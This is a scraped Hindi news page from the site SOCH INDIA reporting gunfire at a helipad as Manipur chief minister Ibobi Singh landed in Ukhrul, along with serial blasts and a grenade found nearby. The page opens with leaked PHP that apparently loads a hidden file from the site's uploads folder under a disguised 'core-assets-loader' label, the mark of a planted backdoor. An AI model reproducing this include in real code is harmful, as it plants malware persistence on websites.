add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); विमान से उतरते ही सीएम इबोबी पर चली गोलियां, एक पुलिसकर्मी घायल – SOCH INDIA
Menu

दुनिया
विमान से उतरते ही सीएम इबोबी पर चली गोलियां, एक पुलिसकर्मी घायल

nobanner

मणिपुर के उखरूल जिले में सोमवार सुबह बम धमाके की खबर के बाद पता चला है कि मुख्यमंत्री इबोबी सिंह के प्लेन ने जहां लैंड किया उस हैलीपैड पर गोलीबारी हुई है. गोलियां उस वक्त चलाई गईं जब मुख्यमंत्री प्लेन से उतर रहे थे. मिली खबर के अनुसार मुख्यमंत्री सुरक्षित हैं लेकिन इस हमले में एक पुलिस अफसर के घायल होने की खबर है. सोमवार को मुख्यमंत्री का उखरूल में दौरा था.

इस हमले के पीछे नेशनल सोशलिस्ट काउंसिल ऑफ नागालैंड के चरमपंथियों का हाथ होने की आशंका जताई जा रही है. मुख्यमंत्री के दौरे से पहले उखरूल में सोमवार को सीरियल बम धमाके हुए. धमाके में एक सुरक्षाकर्मी के घायल होने की भी खबर है.

गौरतलब हो कि रविवार को उखरूल के ही जिलाधिकारी के आवासीय परिसर में एक हैंड ग्रेनेड पाया गया था. जिलाधिकारी के परिवार के एक सदस्य को ये हैंड ग्रेनेड दिखा, जिसके बाद पुलिस को खबर दी गई. मणिपुर पुलिस के बम विशेषज्ञों ने हैंड ग्रेनेड को हटा दिया है और एक सुरक्षित जगह में विस्फोट कर दिया.